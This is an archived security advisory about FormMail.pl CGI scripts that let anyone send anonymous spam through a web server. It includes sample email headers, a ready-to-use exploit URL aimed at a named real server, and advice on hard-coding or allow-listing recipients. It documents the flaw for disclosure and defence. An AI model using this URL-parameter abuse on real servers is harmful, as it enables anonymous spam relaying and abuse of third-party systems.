TUCoPS :: Web :: Apps :: fmail2.htm

FormMail.pl can be used by spammers to send fakemail 
Vulnerability

    FormMail.pl

Affected

    FormMail

Description

    Michael  Rawls  found  following.   He  did  a little playing with
    FormMail.pl after a run in  with a spammer abusing our  webserver.
    Apparently ALL  FormMail.pl cgi-bin  scripts can  be used  to spam
    anonymously.  He found  another server with FormMail.pl  and tried
    the same exploit to send myself an email and it worked.

    The email  will not  show the  spammer's real  IP.   Only the  web
    servers IP will show.  The  web server logs will however show  the
    true IP address of the spammer.

    Actual example of email sent:

        Return-Path: <apache@hum.auc.dk>
        Received: from hercules.humfak.auc.dk (hercules.humfak.auc.dk [130.225.58.9])
	        by mail.dancris.com (8.9.3/8.9.3) with ESMTP id RAA14431
	        for <spam-l@shadowstorm.com>; Sat, 10 Mar 2001 17:19:34 -0700
        Received: from apache by hercules.humfak.auc.dk with local (Exim 3.02 #8)
	        id 14bta3-0004tP-00
	        for spam-l@shadowstorm.com; Sun, 11 Mar 2001 01:19:27 +0100
        To: spam-l@shadowstorm.com
        From: ()
        Subject: WWW Form Submission
        Message-Id: <E14bta3-0004tP-00@hercules.humfak.auc.dk>
        Date: Sun, 11 Mar 2001 01:19:27 +0100
        X-UIDL: TPj"!bg3"!i:T!!=FU"!

        Below is the result of your feedback form.  It was submitted by
        () on Sunday, March 11, 2001 at 01:19:27
        ---------------------------------------------------------------------------

        message: Proof that FormMail.pl can be used to send anonymous spam.

        ---------------------------------------------------------------------------

    Paste the line below  in to your web  browser URL box as  one long
    single  line,   insert  your   email  in   address  in   place  of
    "email@address-to-spam.com", and press enter.   Now go check  your
    email:

        http://www.hum.auc.dk/cgi-bin/FormMail.pl?recipient=email@address-to-spam.com&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymous%20spam

    The address "www.hum.auc.dk" can  be replaced with the  address of
    ANY webserver set up to use FormMail.pl

Solution

    There's a few ways  to get around this.   Firewall the IP  address
    of  the  spammer.   The  best(?)  way  is  (if/where  possible) to
    hard-code the recipient address into the installation.

    Patching FormMail to check the referrer is NOT ample security.  It
    takes  about  30  seconds  to  write  a  Perl  script  to  POST to
    FormMail.pl with a faked  HTTP_REFERRER field.  Probably  the only
    useful solution is  to hack the  script to use  an array of  valid
    email addresses to send to, rather than an array of valid  domains
    to send from.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH